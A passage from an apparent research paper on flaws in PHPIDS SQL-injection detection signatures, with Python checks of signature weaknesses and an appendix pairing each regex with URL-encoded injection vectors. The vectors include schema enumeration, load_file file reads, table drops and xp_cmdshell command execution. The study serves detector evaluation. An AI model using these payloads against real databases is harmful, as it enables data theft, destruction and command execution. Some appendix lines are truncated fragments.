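```python
import re

S63 = re.compile(
    r'(?:;\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)'
    r'\s*[\[(]?\w{2,})',
    re.IGNORECASE,
)
S68 = re.compile(r'(?:waitfor\s*delay\s?"+\s?\d)', re.IGNORECASE)

# Each pair holds a vector the signature catches and a variant that
# repeats a character the rule allows at most once.
checks = {
    "S63 single paren": (S63, '1; select(version())'),
    "S63 triple paren": (S63, '1; select(((version())))'),
    "S68 single space": (S68, '1; waitfor delay "0:0:5"'),
    "S68 double space": (S68, '1; waitfor delay  "0:0:5"'),
}
outcome = {name: sig.search(vec) is not None for name, (sig, vec) in checks.items()}
for name, hit in outcome.items():
    print(f"{name}: detected={hit}")
```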
Susceptibility of the signatures is also one of the causes of false negatives in the detector. It is
usually caused by limiting, in the rule, characters that can be repeated indefinitely in the attack vector. In
order to design good signatures, a developer must think from the attacker's point of view and be aware of the
different ways that can be used to bypass a rule.
A redundant signature adds nothing new. While designing signatures, it is quite possible to end up with two signatures
such that one is a more specific version of the other, which means the detection coverage provided by the specific one
is a subset of that of the other. Therefore, we call a signature redundant if the set of attack vectors detected by it
is included in the set of attack vectors detected by some other signature of the IDS.
Definition 4: Let $S$ = { set of signatures in IDS } and $S_a(n)$ = { set of attack vectors detected by $S(n)$ }. A
signature $S(n)$ is redundant iff $S_a(n) \subseteq S_a(k)$ for some $S(k) \in S$ with $k \neq n$.
In section 4, we observed that some signatures are generic in nature and supersede a major portion of the
other signatures, making them redundant. Besides the generic signatures, we also observed several signatures in
set B that form a superset of others. Take the example of two signatures from set B, S26 (?:"\s*like\W+) and S32
(?:"\s*like\W*["\d]). S32 is the more specific version of S26, since S26 is capable of detecting all the attack vectors
that are detected by S32. In an IDS, the number of signatures affects the performance of the system:
the higher the number of signatures, the more processing time is required to determine whether the input is benign or
malicious. Each signature should therefore have significance in the system and contribute to the detection coverage.
The signature set is optimal if there is no redundancy among its signatures. Redundant signatures only
increase the size of the set and add no new functionality to the detection system. Eliminating them
helps in reducing the size of the signature set.
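Redundancy in the sense described above can be approximated empirically by comparing detection sets over a corpus of attack vectors. The sketch below uses S26 and S32 with a small hypothetical corpus; a subset relation on a finite sample only suggests redundancy, it does not prove it, and case-insensitive matching on raw input is assumed.

```python
import re

S26 = re.compile(r'(?:"\s*like\W+)', re.IGNORECASE)
S32 = re.compile(r'(?:"\s*like\W*["\d])', re.IGNORECASE)

# Hypothetical sample vectors, not the article's test set.
SAMPLE_VECTORS = ['1" like "1', '1" like 1', '1" like (name)', 'a" like "%', "1 or 1"]

def detected_set(signature, vectors):
    """Return the vectors matched by the signature."""
    return {v for v in vectors if signature.search(v)}

def is_redundant(candidate, other, vectors):
    """True if the candidate detects something, and only vectors the other also detects."""
    a = detected_set(candidate, vectors)
    b = detected_set(other, vectors)
    return bool(a) and a <= b

print(is_redundant(S32, S26, SAMPLE_VECTORS))  # True
print(is_redundant(S26, S32, SAMPLE_VECTORS))  # False
```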
The IDS contains various pre-processing and pre-filter routines for enhancing the efficiency of the system. The
signature rules are applied to the processed input to decide whether it is malicious. If the rules were designed on the
basis of raw input, they may yield unexpected results or even allow attack vectors to pass through
the IDS. While assessing the signatures of PHPIDS, we observed attack vectors that can bypass the
detector even though the right signature is there to detect them. A signature is termed inconsistent if it lets through
some of the attack vectors despite having the capability to detect them.
Definition 5: Let $IDS'_a$ = { set of attack vectors bypassed by IDS } and $S_a(n)$ = { set of attack vectors detected by
$S(n)$ }. A signature $S(n)$ is inconsistent iff $IDS'_a \cap S_a(n) \neq \emptyset$.
For example, the attack vector (1)or (5|"1") is converted to (1)or (5|1) by one of the normalizing functions of the IDS,
which leaves the associated signature S8, (?:[^\w\s]\w+\s*[|-]\s*"\s*\w), unable to detect it. The pre-filtering
policies are also found to reduce the detection accuracy of the signatures. To increase the
performance of PHPIDS, only those requests whose values are not alphanumeric are passed to the rule set. Although the
filter function is implemented to avoid verifying unnecessary requests, there are attack vectors that do not
contain any special characters. The attack vectors “1 or @user or 1” and “1 or 1 having 1” go undetected despite the
presence of the matching signatures S9 ((?:@\w+\s+(and|or)\s*["\d]+)) and S75 (?:\W+\d*\s*having\s*[^\s\-]), respectively.
Inconsistency is essentially a weakness caused by a lack of coordination between the IDS policies
and the signatures. It reduces the detection capability of the designed signatures and increases the number of false
negatives. Table 4 summarizes the categories of weak signatures.
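The interplay between IDS policies and signatures can be sketched as a small pipeline. The normalize and passes_prefilter functions below are hypothetical stand-ins for the PHPIDS routines, written only to mimic the behavior described in the text; the signatures are copied from the text and applied case-insensitively, which is an assumption.

```python
import re

S8 = re.compile(r'(?:[^\w\s]\w+\s*[|-]\s*"\s*\w)', re.IGNORECASE)
S9 = re.compile(r'((?:@\w+\s+(and|or)\s*["\d]+))', re.IGNORECASE)
S75 = re.compile(r'(?:\W+\d*\s*having\s*[^\s\-])', re.IGNORECASE)

def normalize(value: str) -> str:
    """Hypothetical normalizer: drop double quotes around plain numbers."""
    return re.sub(r'"(\d+)"', r"\1", value)

def passes_prefilter(value: str) -> bool:
    """Hypothetical pre-filter: forward only values containing a character
    other than letters, digits, underscore, whitespace or '@'."""
    return re.search(r"[^\w\s@]", value) is not None

def ids_detects(signature, value: str) -> bool:
    """Run the pre-filter, then the normalizer, then the signature."""
    if not passes_prefilter(value):
        return False  # the value never reaches the rule set
    return signature.search(normalize(value)) is not None

cases = [(S8, '(1)or (5|"1")'), (S9, "1 or @user or 1"), (S75, "1 or 1 having 1")]
report = []
for signature, vector in cases:
    alone = signature.search(vector) is not None
    report.append((vector, alone, ids_detects(signature, vector)))
    print(f"{vector!r}: signature alone={alone}, full pipeline={report[-1][2]}")
```

In each case the signature matches the raw vector, yet the pipeline as a whole lets it through, which is the situation the inconsistent category describes.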
6. Conclusion
The performance of signature-based systems is strongly dependent on the quality of the signature database. Since
these signatures are mostly created by security experts, their quality depends strongly on
the extent of the expert's knowledge of the attack domain, and on how precisely the patterns of the attacks are captured
and implemented. The paper first discussed four key aspects of the SQL injection attack domain, namely
the structure of attack strings, DBMS variations, the intention of attack vectors and tampering schemes, in order to
highlight peculiar and significant details that might be overlooked by the developer while designing
signatures. The paper then described an experiment on PHPIDS that evaluated the quality of its signature set. The
experiment revealed various pitfalls in the signature set, such as the presence of generic and susceptible signatures,
blind spots, etc. The contribution of individual signatures is highly imbalanced, as some signatures
are triggered very frequently in the detector. These signatures are extremely generic in nature and capable of
detecting a large portion of the attack vectors. They are so sensitive that they put the
system at risk of a high false positive rate. Moreover, they make most of the other signatures of the detection
system obsolete by providing a superset of their detection coverage. However, the experiment also clearly showed the
importance of such generic signatures in the detection system, since the non-generic signatures were found to be
susceptible and insufficient to deal with the attack vectors. The experiment also revealed possible blind
spots in the detector by identifying the classes of attack vectors missed by the generic signatures.
Based on the case study, we identified various potential reasons behind poorly designed signatures. Weak
signatures are divided into six categories, namely incomplete, irrelevant, semi-relevant, susceptible, redundant and
inconsistent. These weaknesses are not limited to SQL injection signatures; they apply to
signatures for any attack class, such as XSS, path traversal and network attacks. Knowledge of these flaws will assist
developers in creating efficient signatures for the detector by making them aware of common poor signature design
practices. Moreover, security experts may use these flaws to assess a detector by conducting structural analysis of its
signature set from a number of perspectives. The mathematical definitions of the types of weak signatures will help to
automate the analysis of the structure of the rules to a great extent.
References:
1. Almgren, M., Debar, H., & Dacier, M. (2000, February). A Lightweight Tool for Detecting
Web Server Attacks. In NDSS.
2. Bau, J., Bursztein, E., Gupta, D., & Mitchell, J. (2010, May). State of the art: Automated
black-box web application vulnerability testing. In Security and Privacy (SP), 2010 IEEE
Symposium on (pp. 332-345). IEEE.
4. Depren, O., Topallar, M., Anarim, E., & Ciliz, M. K. (2005). An intelligent intrusion
detection system (IDS) for anomaly and misuse detection in computer networks. Expert
systems with Applications, 29(4), 713-722.
5. Heberlein, L. T., Dias, G. V., Levitt, K. N., Mukherjee, B., Wood, J., & Wolber, D. (1990,
May). A network security monitor. In Research in Security and Privacy, 1990.
Proceedings., 1990 IEEE Computer Society Symposium on(pp. 296-304). IEEE.
7. Kim, H. A., & Karp, B. (2004, August). Autograph: Toward Automated, Distributed Worm
Signature Detection. In USENIX security symposium (Vol. 286).
8. Kruegel, C., & Vigna, G. (2003, October). Anomaly detection of web-based attacks. In
Proceedings of the 10th ACM conference on Computer and communications security
(pp. 251-261). ACM.
9. Massicotte, F., & Labiche, Y. (2011, June). An analysis of signature overlaps in Intrusion
Detection Systems. In Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st
International Conference on (pp. 109-120). IEEE.
10. Massicotte, F., & Labiche, Y. (2012, November). On the Verification and Validation of
Signature-Based, Network Intrusion Detection Systems. In Software Reliability
Engineering (ISSRE), 2012 IEEE 23rd International Symposium on (pp. 61-70). IEEE.
11. Mell, P., Hu, V., Lippmann, R., Haines, J., & Zissman, M. (2003). An overview of issues in
testing intrusion detection systems.
12. Milenkoski, A., Vieira, M., Kounev, S., Avritzer, A., & Payne, B. D. (2015). Evaluating
computer intrusion detection systems: A survey of common practices. ACM Computing
Surveys (CSUR), 48(1), 12.
216
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
References:
13. Morgan, D. (2006). Web application security–SQL injection attacks. Network security,
2006(4), 4-5.
14. Puketza, N. J., Zhang, K., Chung, M., Mukherjee, B., & Olsson, R. A. (1996). A methodology
for testing intrusion detection systems. IEEE Transactions on Software Engineering,
22(10), 719-729.
15. Roesch, M. (1999, November). Snort: Lightweight intrusion detection for networks. In
Lisa (Vol. 99, No. 1, pp. 229-238).
16. Roschke, S., Cheng, F., & Meinel, C. (2009, August). An extensible and
virtualization-compatible IDS management architecture. In Information Assurance and
Security, 2009. IAS'09. Fifth International Conference on (Vol. 2, pp. 130-134). IEEE.
18. Stakhanova, N., & Ghorbani, A. A. (2010, April). Managing intrusion detection rule sets. In
Proceedings of the Third European Workshop on System Security (pp. 29-35). ACM.
19. Tang, Y., & Chen, S. (2007). An automated signature-based approach against
polymorphic internet worms. IEEE Transactions on Parallel and Distributed Systems,
18(7).
20. Vaidya, V. (2001). U.S. Patent No. 6,279,113. Washington, DC: U.S. Patent and Trademark
Office.
21. Vigna, G., Robertson, W., & Balzarotti, D. (2004, October). Testing network-based
intrusion detection signatures using mutant exploits. In Proceedings of the 11th ACM
conference on Computer and communications security (pp. 21-30). ACM.
22. Wani, M. A., Agarwal, N., Jabin, S., & Hussai, S. Z. (2018). Design and Implementation of
iMacros-based Data Crawler for Behavioral Analysis of Facebook Users. arXiv preprint
arXiv:1802.09566.
23. Wassom, D. (2003). Intrusion Detection Systems: An Overview of Real Secure. SANS
Institute, October.
217
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
References:
25. Yegneswaran, V., Giffin, J. T., Barford, P., & Jha, S. (2005, August). An Architecture for
Generating Semantic Aware Signatures. In USENIX Security Symposium (pp. 97-112).
26. Zanero, S. (2007). Flaws and frauds in the evaluation of IDS/IPS technologies. In Proc. of
FIRST.
27. Zheng, M., Sun, M., & Lui, J. C. (2013, July). Droid analytics: A signature based analytic
system to collect, extract, analyze and associate android malware. In Trust, Security and
Privacy in Computing and Communications (TrustCom), 2013 12th IEEE International
Conference on (pp. 163-171). IEEE.
218
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Appendix A
]) %20||user()
S8  (?:[^\w\s]\w+\s*[|-]\s*"\s*\w)
    %20and%20(select(1|%221%20%20%22))
    %20and%20(1|%221%20%20%22)
    (1|%221%20%20%22)
    %20order%20by%20(1|%221%20%20%22)
    %20group%20by%20(1|%221%20%20%22)

S9  (?:@\w+\s+(and|or)\s*["\d]+)
    (@1%20or%201|%221%20%20%22)
    %20xor%20@1%20and%20%221%22
    @@version%20and%20%221%22
    %20having%20@@version%20and%20%221%22
    %20group%20by%20@@version%20and%20%221%22

S10  (?:@[\w-]+\s(and|or)\s*[^\w\s])
    %20or%20@1%20and%20(%221%22)
    %20or%20@1%20and%20%22(1)%22
    %20order%20by%20@1%20and%20(%221%22)
    %20group%20by%20@1%20and%20(%221%22)
    %20having%20@1%20and%20(%221%22)

S11  (?:[^\w\s:]\s*\d\W+[^\w\s]\s*".)
    %20or%20(5=(%22k%22))
    %20||%20(5=(%22k%22))
    %20having%20(5=(%22k%22))
    %20group%20by%20(5=(%22k%22))
    %20or%20(5!=%20(%22k%22))

S12  (?:\Winformation_schema|table_name\W)
    (1)%20union%20select%201,table_name,1%20from%20information_schema.tables
    (1)%20union%20select%201,column_name,1,1,1,1%20from%20information_schema.columns
    (1)%20union%20/**/select%201,table_name,1%20from/**/%20information_schema.tables
    (1)%20union%20(select%201,table_name,1%20from%20information_schema.tables)
    (1)%20union%20(select%201,concat(table_name,1),1,1,1,1%20from%20information_schema.tables)

S13  (?:"\s*\*.+(?:or|id)\W*"\d)
    %20or%20%22*%22%20or%20%221%20%22
    %20or%20%22*%22%20id=%20%221%20%22
    %20or%20%22*%22%20or%20!%20%221%20%22
    %20or%20%22*%22%20or%20(%20%221%20%22)
    %20or%20%22*%22%20or%20/**/(%20%221%20%22)

S14  (?:\^")
    %20or%20%22^%22
    %20group%20by%20%22^%22
    %20having%20%20%22^%22
    %20||%20%20%22^%22
    %20xor%20%20%22^%22

S15  (?:"[\s\d]*[^\w\s]+\W*\d\W*.*["\d])
    or 'a' ='5'
    %20or%20%22a%22%20=(55)
    %20||%20%22a%22%20=%225%22
    %20xor%20%22a%22%20=(55)
    %20group%20by%20%22a%22%20=(55)

S16  (?:"\s*[^\w\s?]+\s*[^\w\s]+\s*")
    or '/* */' or 1
    (1)%20or%20%22A%22%3C=%22B%22
    (1)%20or%20%22C%22%3C=%22B%22
    (1)%20or%20%22C%22||%22B%22
    (1)%20or%20%22C%22!=%22B%22

S17  (?:"\s*[^\w\s]+\s*[\W\d].*(?:#|--))
    %20or%20%22%201%22%3E5--
    %20or%20%22%201%22%3E@5--
    %20or%20%22%201%22%3E@5--
    %20or%20%22%201%22%20||%20@version--
    %20or%20%22%201%22%20||%201%20group%20by%20@version--

S18  (?:".*\*\s*\d)
    %20or%20%22*1%22
    %20xor%20%22*1%22
    %20order%20by%20%22*1%22
    %20union%20select%20%20%22*1%22
    %20union%20/**/select%20%20%22(*1)%22

S19  (?:"\s*or\s[^\d]+[\w-]+.*\d)
    %20or%20%22*%22%20or%20id=%225%22
    %20or%20%22%20%22%20or%20(5)
    %20or%20%22%20%22%20or%20@version%3E5
    %20or%20%22%20%22%20or%20@version
    %20or%20%22%20%22%20or%20@1

S20  (?:[()*<>%+-][\w-]+[^\w\s]+"[^,])
    %20group%20by%20%22(2)%22--
    %20group%20by%20%22(a)%22--
    %20order%20by%20%20%22(a)%22--
    %20||%20%22(2)%22--
    %20union%20select%20%22(2)%22--

S21  (?:^admin\s*"|(\/\*)+"+\s?(?:--|#|\/\*|{)?)
    admin%22%20or%20%221
    admin%22%20and%20%221
    ad%22%20and%20%221%22%20/*%22*/--%20h
    %20and%200%20/*%22*/
    %20and%200%20/*%22%22*/--

S22  (?:"\s*or[\w\s-]+\s*[+<>=(),-]\s*[\d"])
    %20or%20%221%20%22%20or%20(5)
    %20or%20%221%20%22%20or%203%3E5
    %20or%20%221%20%22%20or%203-5
    %20or%20%221%20%22%20or%20id-5
    %20or%20%221%20%22%20or%20id=5

S23  (?:"\s*[^\w\s]?=\s*")
    %20or%20%221%20%22%20%3E=%20%22%202%22
    %20or%20%221%20%22%20=%20%22%202%22
    %20or%20%221%20%22%20!=%20%22%202%22
    %20order%20by%20%221%20%22%20!=%20%22%202%22
    %20having%20%221%20%22%20!=%20%22%202%22

S24  (?:"\W*[+=]+\W*")
    %20or%20%221%20%22=%22%201%22
    %20or%20%221%20%22%3E=%22%201%22
    %20||%20%221%20%22%3E=%22%201%22
    %20order%20by%20%221%20%22%3E=%22%201%22
    %20group%20by%20%221%20%22%3E=%22%201%22

S25  (?:"\s*[!=|][\d\s!=+-]+.*["(].*$)
    %20or%20%221%20%22=%222%22
    %20or%20%221%20%22%20!=%222%22
    %20union%20select%20%221%20%22%20%20=%222%22
    %20union%20select%20(%221%20%22%20%20=%222%22)
    %20union%20/**/select%20%221%20%22%20%20=%222%22

S26  (?:"\s*like\W+)
    %20or%20%22a%22%20like%20%22a%22
    %20or%20%22a%22%20like%20%22b%22
    %20and%20%22a%22%20like%20%22b%22
    %20and%20(Select%20%22a%22%20like%20%22b%22)
    %20||%20(Select%20%22a%22%20like%20%22a%22)

S27  (?:where\s[\s\w\.,-]+\s=)
    %201%20union%20select%201%20from%20test%20where%201%20=1
    ;%20delete%20from%20product_tbl%20where%20id%20=4%20--
    1;%20;update%20product_tbl%20set%20name%20=%20%27shirt%27%20where%20id%20=1%20--
    1; delete from product_tbl where 1 = 1
    1; delete from product_tbl where 2 = 1

S28  (?:"[<>~]+")
    5%20or%20%22b%22%3C%22a%22
    5%20or%20%22a%22%3C%22b%22
    5%20or%20%22(a)%22%3C%22(b)%22
    5%20having%20%22(a)%22%3C%22(b)%22
    5%20having%20%22(a)%22%3E%22(b)%22

S29  (?:union\s*(?:all|distinct|[(!@]*)?\s*[([]*\s*select)
    %20union%20select%20(%22a$%22)
    %20union%20select%20(%22a%22%3E%22b%22)
    %20union%20all%20select%201,1,1
    %201%20union%20select%201%20from%20test%20where%201=1
    %20union%20distinct%20select%20(%22%a$%22)

S30  (?:\w+\s+like\s)
    %20or%20@1%20like%20%221%22
    %20and%20@1%20like%20%221%22
    %20group%20by@1%20like%20%221%22
    %20order%20by@1%20like%20%221%22
    %20^%20(Select@1%20like%20%221%22)

S31  (?:like\s*"\%)
    %20or%20%22a%22%20like%20%22%%22
    %20or%20(%22a%22)%20like%20%22%%22
    %20or%20(select((%22a%22)like%20%22%%22))
    %20or%20(select(1%20like%20%22%%22))
    %20and%20(select(1%20like%20%22%%22))

S32  (?:"\s*like\W*["\d])
    %20or%20%22a%22%20like%20%22a%%22
    %20and%20%22a%22%20like%20%22a%%22
    %20||%20%22a%22%20like%20%22a%%22
    %20||%20%22a%22like%20%22a%%22
    %20having%20%22a%22like%20%22a%%22

S33  (?:"\s*(?:n?and|x?or|not |\|\||\&\&)\s+[\s\w]+=\s*\w+\s*having)
    %20or%20%221%20%22%20%20xor%201=1%20having%201
    %20or%20%221%20%22%20%20and%201=1%20having%201
    %20and%20%221%20%22%20%20and%20a=1%20%20having%201
    %20||%20%221%20%22%20%20||%201=1%20%20having%201
    %20or%20%221%20%22%20%20||%201=1%20%20having%201

S34  (?:"\s*\*\s*\w+\W+")
    %20or%20%22*a$%22
    %20||%20%22*a$%22
    %20||%20%22*a%22=%22a%22
    %20||%20%22*a%22%3E=%22a%22
    %20||%20%22*a%22!=%22a%22

S35  (?:"\s*[^?\w\s=.,;)(]+\s*[(@"]*\s*\w+\W+\w)
    %20xor%20%221%20%22%3E1||1
    %20xor%20%221%20%22-1||-1
    %20and%20%221%20%22-1||-1
    %20and%20%222%20%22%3E%221%22||(0)
    %20and%20%22b%22%3E%22a%22||(0)

S36  (?:select\s*[\[\]()\s\w\.,"-]+from)
    %20union%20all%20select%201,1,1,1,1,1%20from%20a
    %20union%20distinct%20select%201,1,1,1,1,1%20from%20a
    %20union%20distinct%20/**/select%201,1,1,1,1,1%20from%20a
    %20union%20distinct%20/**/select%20(1)%20,1,1,1,1,1%20from%20a
    %20union%20distinct%20/**/select%2010,%221%22,1,1,1,1%20from%20a

S37  (?:find_in_set\s*\()
    %20or%20find_in_set(%22a%22,%22a,b%22)
    %20or%20find_in_set(%22a%22,NULL)
    %20order%20by%20find_in_set(%22a%22,NULL)
    %20group%20by%20find_in_set(%22a%22,NULL)
    %20union%20select%20find_in_set(%22a%22,NULL)

S38  (?:in\s*\(+\s*select)
    %20or%201%20in%20(select%201)
    %20and%201%20in%20(select%201)
    %20and%201%20in%20(select%20%22@1%22)
    %20order%20by%201%20in%20(select%20%22@1%22)
    %20having%201%20in%20(select%20%22@1%22)

S39  (?:(?:n?and|x?or|not |\|\||\&\&)\s+[\s\w+]+(?:regexp\s*\(|sounds\s+like\s*"|[=\d]+x))
    %20or%201%20regexp%20(%22\W%22)
    %20or%200%20union%20select%201%20regexp%20(%22\W%22),1,1,1,1,1
    %20or%200%20union%20select%201%20regexp%20(%22\W%22),1,1,1,1,1
    %20or%200%20union%20select%201%20regexp%20(%22\W%22),%201%20regexp%20%22\d%22,3,4,5,6
    %20or%20%201%20sounds%20like%20%22%200%22

rt|desc)) 1;truncate%20table%20hacker
S45  (?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s+(?:(?:group_)concat|char|load_file)\s?\(?)
    %20union%20select%20char(%22A%22)
    %20union%20select%20group_concat(%22A%22)
    %20union%20select%20group_concat(%22A%22,%22B%22)
    %20union%20select%20group_concat(%22A%22,(%22B%22))
    %20union%20select%20char(1)

S46  (?:end\s*\);)
    %20union%20select%20(case%20when%201%20then%201%20end);
    %20union%20select%20(case%20%22A%22%20when%20TRUE%20then%20FALSE%20end);
    %20union%20select%20(case%20%22A%22%20when%20TRUE%20then%20FALSE%20else%200%20end);
    %20union%20select%20(case%20%22A%22%20when%201-2%20then%20(2-3)%20else%200%20end);
    %20union%20all%20/**/select%20(case%20%22A%22%20when%201||2%20then%20(2-3)%20else%200%20end);

S47  ("\s+regexp\W)
    %20union%20all%20select%201,1,1,1,1,1%20from%20product_tbl%20where%20%22a%22%20regexp%20(%22a%22)
    %20union%20all%20select%201,2,3,4,%22a%22%20regexp%20%22b%22,5
    %20union%20all%20select%201,2,3,4,%22a%22%20regexp%20(1),5
    %20or%20%22a%22%20regexp%20(1)
    %20||%20(%22a%22%20regexp%20(%22a%22))

S48  (?:[\s(]load_file\s*\()
    %20union%20select%201,2,3,4,5,%20load_file(%22C:/xampp/tmp/test.txt%22)
    %20or%20load_file(%22C:/xampp/tmp/test.txt%22)
    %20or%20load_file(%22C:/xampp/tmp/test1.txt%22)
    %20group%20by%20load_file(%22C:/xampp/tmp/test1.txt%22)
    %20order%20by%20load_file(%22C:/xampp/tmp/test1.txt%22)

S49  (?:@.+=\s*\(\s*select)
    %20union%20distinct%20select%201,2,3,4,5,6%20from%20product_tbl%20where%20@id%20=%20(select%201)
    %20or%20@id%20=%20(select%201)
    %20having%20@id%20=%20(select%201)
    %20group%20by%20@id%20=%20(select%201)
    %20order%20by%20@id%20=%20(select%201)

S50  (?:\d+\s*or\s*\d+\s*[\-+])
    %20or%201-1
    %20||%201%20or%201-1
    %20and%201%20or%201-1
    %20|%201%20or%201-1
    %20xor%201%20or%201-1

S51  (?:\d\s+group\s+by.+\()
    %20group%20by%20(2)
    %20group%20by%20(7)
    %20or%201%20group%20by%20(6)
    %20and%201%20group%20by%20(6)
    %20%20group%20by%20(6)%20having%201

S52  (?:(?:;|#|--)\s*(?:drop|alter))
    1%20;%20drop%20table%20A
    1%20;%20alter%20table%20abc%20drop%20column%20id
    1%20;%20alter%20table%20abc%20add%20id2%20int
    1%20;%20drop%20table%20test2.dbo.abc
    1%20;%20alter%20table%20abc%20drop%20column%20id2

S53  (?:(?:;|#|--)\s*(?:update|insert)\s*\w{2,})
    1%20;update%20%20abc%20set%20id=5%20where%20id=1
    1%20;update%20%20abc%20/**/set%20id=10%20where%20id=5
    1%20;insert%20into%20abc%20values(23);
    1%20;%20insert%20into%20abc%20values(%2225%22,%221%22)
    1%20;%20insert%20into%20/**/abc%20values(27)

S54  (?:(?:n?and|x?or|not |\|\||\&\&)[\s(]+\w+[\s)]*[!=+]+[\s\d]*["=()])
    %20or%20%221%22%20=%20%22%202%22
    %20or%201=(1)
    %20or%201=%22%201%22
    %20and%201=%22%201%22
    %20and%20(1=%221%22)

S55  (?:\(\s*select\s*\w+\s*\()
    %20union%20(select%20user(),user(),1,1,1,1)
    %20union%20(select%20version())
    %20union%20(select%20version(),2,3,4,5,6)
    %20or%20(select%20version())
    %20and%20(select%20version())

S56  (?:\*\/from)
    %20or%20id%20=(select%201%20/**/from%20product_tbl%20limit%201)
    %20or%20id%20=(select%201%20/**/from%20product_tbl%20where%201%20limit%201)
    %20and%20id%20=(select%201%20/**/from%20product_tbl%20where%201%20limit%201)
    %20union%20(select%201,2,3,4,5,6%20/**/from%20product_tbl%20where%201%20limit%201)
    %20union%20(select%201,2,3,4,5,6%20/**/from%20product_tbl%20%20limit%201)

S57  (?:\w"\s*(?:[-+=|@]+\s*)+[\d(])
    %20or%20%22a%22%20=(5)
    %20or%20%22a%22%20=5
    %20or%20%22a%22%20|(@user)
    %20and%20%22a%22%20-(%22b%22)
    %20and%20%22c%22=%20(%22c%22)

S58  (?:coalesce\s*\(|@@\w+\s*[^\w\s])
    (1)%20or%20coalesce%20(NULL)
    %20or%20coalesce%20(NULL,1)
    %20and%20coalesce%20(NULL)
    %20or%20(select(coalesce(1)))
    %20group%20by%20(select(coalesce(1)))

S59  (?:\W!+"\w)
    %20or%20!%221%22
    %20and%20!%221%22
    %20order%20by%20(!%221%22)
    %20or%201=%20(!%221%22)
    %20and%201=%20(!%221%22)

S60  (?:order\s+by\s+if\w*\s*\()
    %20order%20by%20if(1,1,1)
    %20order%20by%20if(user(),1,1)
    %20order%20by%20if(user(),TRUE,FALSE)
    %20order%20by%20if(1|1,TRUE,FALSE)
    %20order%20by%20if((1%3E1),TRUE,FALSE)

S61  (?:[\s(]+case\d*\W.+[tw]hen[\s(])
    %20xor%20(select%20case%20%22A%22%20when%201%20then%200%20end)
    %20xor%20(select%20case%201%20when%201%20then%200%20end)
    %20and%20(select%20case%201%20when%201%20then%200%20end)
    %20union%20select%20case%20@1%20when%201%20then%200%20end,1,2,3,4,5
    %20nand%20select%20concat(case%20@1%20when%201%20then%200%20end,1)

S62  (?:(select|;)\s+(?:benchmark|if|sleep)\s*?\(\s*\(?\s*\w+)
    %20union%20select%20sleep(5),2,3,4,5,6
    %20or%20(select%20sleep(4))
    %20or%20(select%20if(1,1,1))
    %20union%20(select%20if(1,1,1))
    %20union%20select%20benchmark(100000,1%3E2),2,3,4,5,6

S63  (?:;\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*[\[(]?\w{2,})
    1;%20Select%20234
    1;%20Select%20(234)
    1;%20update%20product_tbl%20set%20name=%27top%27%20where%20id=1
    1;%20create%20table%20test2%20(id%20int)
    1;%20insert%20into%20test2%20values(5)

S64  (";\s*waitfor\s+time\s+")
    1%20or%20%221%22;%20waitfor%20time%20%2200:00:00%22
    1%20or%20%221%22;%20waitfor%20time%20%22(00:00:00)%22
    1%20and%20%221%22;%20waitfor%20time%20%22(00:00:00)%22
    1%20and%20%221%22;%20waitfor%20time%20%22((00:00:00))%22
    1%20xor%20%221%22;%20waitfor%20time%20%22((00:00:00))%22

S65  (?:procedure\s+analyse\s*\()
    %20procedure%20analyse(1)
    %20procedure%20analyse()
    %20limit%201,1%20procedure%20analyse()
    %20limit%206,1%20procedure%20analyse()
    %20limit%206,1%20procedure%20analyse(1,1)

S66  (?:;\s*(declare|open)\s+[\w-]+)
    1%20;%20DECLARE%20my_cursor%20CURSOR%20FOR%20SELECT%20*%20FROM%20product_tbl%20OPEN%20my_cursor%20FETCH%20NEXT%20FROM%20my_cursor;
    1%20;use test;%20DECLARE%20my_cursor%20CURSOR%20FOR%20SELECT%20*%20FROM%20product_tbl%20OPEN%20my_cursor%20FETCH%20NEXT%20FROM%20my_cursor;
    1%20;%20DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%20EMP_ID,%20RANDOM_GEN_NO%20FROM%20SAMPLE_EMPLOYEE%20FOR%20UPDATE%20OF%20RANDOM_GEN_NO%20OPEN%20EMP_CURSOR
    1%20;%20DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%201,1,1%20%20OPEN%20EMP_CURSOR
    1%20;%20use test; DECLARE%20EMP_CURSOR%20CURSOR%20FOR%20SELECT%201,1,1%20%20OPEN%20EMP_CURSOR

S67  (?:declare[^\w]+[@#]\s*\w+)|(exec\s*\(\s*@)
    1%20;USE%20test%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%20%27CREATE%20PROCEDURE%20dbo.sp_bar2%20AS%20BEGIN%20SELECT%20%27%27a%27%27%20END;%20%27;%20EXEC%20test.dbo.sp_executesql%20@sql;
    1%20;USE%20test%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%20%27CREATE%20PROCEDURE%20dbo.sp_bar3%20AS%20BEGIN%20SELECT%20%27%27a%27%27%20END;%20%27;%20EXEC%20sp_executesql%20@sql;
    1%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%20%27CREATE%20PROCEDURE%20dbo.sp_bar4%20AS%20BEGIN%20SELECT%20%27%27a%27%27%20END;%20%27;%20EXEC%20sp_executesql%20@sql;
    1%20;use%20test;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%27Create%20Function%20TL()%20returns%20int%20as%20Begin%20return%201;%20end;%27%20EXEC%20sp_executesql%20@sql;
    1%20;%20DECLARE%20@sql%20NVARCHAR(800)%20SET%20@sql=%27Create%20Function%20TLS()%20returns%20int%20as%20Begin%20return%201;%20end;%27%20EXEC%20sp_executesql%20@sql;

S68  (?:waitfor\s*delay\s?'+\s?\d)
    1%20;%20waitfor%20delay%2700:00:01%27
    1%20;%20waitfor%20delay%27%2000:00:01%27
    1%20;Begin%20waitfor%20delay%27%2000:00:04%27%20end;
    1%20;Begin%20waitfor%20delay%2700:00:04%27%20end;
    1%20;%20/**/waitfor%20delay%2700:00:02%27%20%20

S69  (?:\sexec\s+xp_cmdshell)
    1%20;%20EXEC%20xp_cmdshell%20%27dir%20*.exe%27;
    1%20;%20EXEC%20xp_cmdshell%20%27COPY%20C:\xampp\test.txt%20C:\xampp\test4.txt%27;
